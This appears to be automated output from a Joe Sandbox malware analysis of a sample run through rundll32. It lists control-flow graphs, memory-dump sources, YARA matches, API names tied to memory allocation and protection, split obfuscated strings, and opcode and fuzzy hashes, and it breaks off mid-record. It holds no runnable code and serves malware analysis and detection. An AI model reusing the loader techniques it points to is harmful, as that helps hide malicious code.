19895290907-1989529090c 68->96 97 198952908ab-198952908b1 68->97 76 19895290945-1989529095a 69->76 77 198952909ec-198952909fa 69->77 74 1989529065a-19895290669 70->74 75 198952906cc-198952906d2 70->75 73 19895290794-198952907a2 71->73 72->73 78 1989529071f-19895290720 72->78 80 198952907a8 73->80 81 1989529085d-1989529085e 73->81 86 1989529066b-19895290678 74->86 87 1989529067a-1989529067e 74->87 75->65 82 198952906d4-198952906d5 75->82 84 1989529097b-1989529097d 76->84 85 1989529095c-1989529095e 76->85 77->69 88 19895290a00-19895290a01 77->88 89 19895290722-19895290784 78->89 93 198952907ae-198952907d4 80->93 81->56 82->52 101 198952909a2-198952909a4 84->101 102 1989529097f-19895290981 84->102 98 19895290960-1989529096c 85->98 99 1989529096e-19895290979 85->99 100 198952906bd-198952906be 86->100 103 19895290680-1989529068a 87->103 104 1989529068c-19895290690 87->104 88->62 89->89 105 19895290786 89->105 94 19895290a7b-19895290a8e 90->94 95 19895290a4c-19895290a54 90->95 92 19895290a38-19895290a3e 91->92 92->90 110 19895290a29-19895290a35 92->110 131 19895290835-19895290839 93->131 132 198952907d6-198952907d9 93->132 94->26 95->94 111 19895290a56-19895290a79 RtlAddFunctionTable 95->111 96->64 108 198952908b3-198952908b9 97->108 109 198952908bb-198952908c8 97->109 112 198952909be-198952909bf 98->112 99->112 100->70 106 198952909a6-198952909aa 101->106 107 198952909ac-198952909bb 101->107 113 19895290983-19895290987 102->113 114 19895290989-1989529098b 102->114 115 198952906b6-198952906ba 103->115 116 19895290692-198952906a3 104->116 117 198952906a5-198952906a9 104->117 105->73 106->112 107->112 121 198952908ea-198952908fe 108->121 122 198952908d3-198952908e5 109->122 123 198952908ca-198952908d1 109->123 110->92 111->94 120 198952909c5-198952909cb 112->120 113->112 114->101 118 1989529098d-1989529098f 114->118 115->100 116->115 117->100 119 198952906ab-198952906b3 117->119 126 19895290991-19895290997 118->126 127 19895290999-198952909a0 118->127 119->115 128 198952909d9-198952909e9 VirtualProtect 120->128 129 198952909cd-198952909d3 120->129 121->96 139 19895290900-19895290905 121->139 122->121 123->122 123->123 126->112 127->120 128->77 129->128 133 19895290844-19895290850 131->133 134 1989529083b 131->134 136 198952907e3-198952907f0 132->136 137 198952907db-198952907e1 132->137 133->93 138 19895290856-19895290857 133->138 134->133 141 198952907f2-198952907f9 136->141 142 198952907fb-1989529080d 136->142 140 19895290812-1989529082c 137->140 138->81 139->97 140->131 144 1989529082e-19895290833 140->144 141->141 141->142 142->140 144->132
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.280302395.0000019895290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019895290000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_19895290000_rundll32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                            • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                            • API String ID: 394283112-2517549848
                                                                                                                            • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                            • Instruction ID: 3995d789eb68150ae1abd7621494e251a71c53c72cc6cc5debf2ccea4cf9f378
                                                                                                                            • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                            • Instruction Fuzzy Hash: FD72E230618A4C8BDB69DF58C9A57F9B7E1FB99304F10462DE88AC3251DF34D942CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                            • API String ID: 0-464535774
                                                                                                                            • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                            • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                            • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                            • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                            • API String ID: 0-3528011396
                                                                                                                            • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                            • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                            • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                            • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 228 180021bdf-180021bee 221->228 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 246->217 247->217
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                            • API String ID: 0-3036092626
                                                                                                                            • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                            • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                            • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                            • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 261 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->261 262 18000cca0-18000cca5 256->262 284 18000cfb4-18000d00a call 1800194a4 257->284 263 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->263 264 18000c64e-18000c653 258->264 286 18000cc28-18000cc85 call 1800194a4 259->286 300 18000cedc-18000cf26 call 1800194a4 261->300 269 18000cd35-18000cdce call 18000703c call 18001c32c 262->269 270 18000ccab-18000ccb0 262->270 263->253 272 18000c9c1-18000ca52 call 18002870c call 18001c32c 264->272 273 18000c659-18000c65e 264->273 309 18000cdd3-18000ce2e call 1800194a4 269->309 279 18000ccb6-18000cd30 call 180021434 270->279 280 18000d00f-18000d014 270->280 311 18000ca57-18000caa0 call 1800194a4 272->311 282 18000c664-18000c669 273->282 283 18000c8bb-18000c963 call 180002610 call 18001c32c 273->283 279->253 280->253 288 18000d01a-18000d020 280->288 292 18000c7b2-18000c85a call 180019618 call 18001c32c 282->292 293 18000c66f-18000c674 282->293 316 18000c968-18000c9bc call 1800194a4 283->316 284->280 286->253 325 18000c85f-18000c8b6 call 1800194a4 292->325 293->280 303 18000c67a-18000c73d call 180002178 call 18001c32c 293->303 300->253 326 18000c742-18000c7ad call 1800194a4 303->326 309->253 311->253 316->253 325->253 326->253
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +#;)$K'$sf$w\H
                                                                                                                            • API String ID: 0-1051058546
                                                                                                                            • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                            • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                            • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                            • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: <4P$<8$<w.
                                                                                                                            • API String ID: 0-1030867500
                                                                                                                            • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                            • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                            • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                            • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                            • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                            • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                            • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                            • API String ID: 0-2447245168
                                                                                                                            • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                            • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                            • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                            • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 583 1800061ab-1800061b0 570->583 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 576 180005a25-180005a2a 572->576 577 180005da6-180005fb1 call 1800093f0 572->577 573->569 581 1800061bb-18000625a call 180001b1c 576->581 582 180005a30-180005a35 576->582 590 180005fc3-180005fc8 577->590 591 180005fb3-180005fbe 577->591 589 18000625f-180006271 581->589 586 180005a3b-180005a40 582->586 587 180005d7e-180005d8c 582->587 588 1800061b6 583->588 583->589 592 180005a46-180005a4b 586->592 593 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 586->593 594 180005d92-180005d96 587->594 588->569 590->569 591->569 598 180005a51-180005a56 592->598 599 180005ad8-180005b68 call 18000abac 592->599 593->569 595 180005d98-180005da1 594->595 596 180005d8e-180005d8f 594->596 595->569 596->594 598->583 600 180005a5c-180005ad3 call 180007958 598->600 599->589 607 180005b6e-180005b73 599->607 600->569 607->569
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                            • API String ID: 0-2100131636
                                                                                                                            • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                            • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                            • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                            • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                            • API String ID: 0-2401169580
                                                                                                                            • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                            • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                            • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                            • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                            • API String ID: 0-1318892062
                                                                                                                            • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                            • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                            • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                            • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                            • API String ID: 0-3477398917
                                                                                                                            • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                            • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                            • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                            • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: JQ$k&($t$v$x\J
                                                                                                                            • API String ID: 0-1134872184
                                                                                                                            • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                            • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                            • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                            • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: R$)H8$?rIc$L==$V
                                                                                                                            • API String ID: 0-2512384441
                                                                                                                            • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                            • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                            • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                            • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Qq$bt$vird$+$S
                                                                                                                            • API String ID: 0-3373980505
                                                                                                                            • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                            • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                            • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                            • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: V$@$P9$^_"
                                                                                                                            • API String ID: 0-1880944046
                                                                                                                            • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                            • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                            • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                            • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =_$F)k$b/$syG
                                                                                                                            • API String ID: 0-3955183656
                                                                                                                            • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                            • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                            • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                            • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
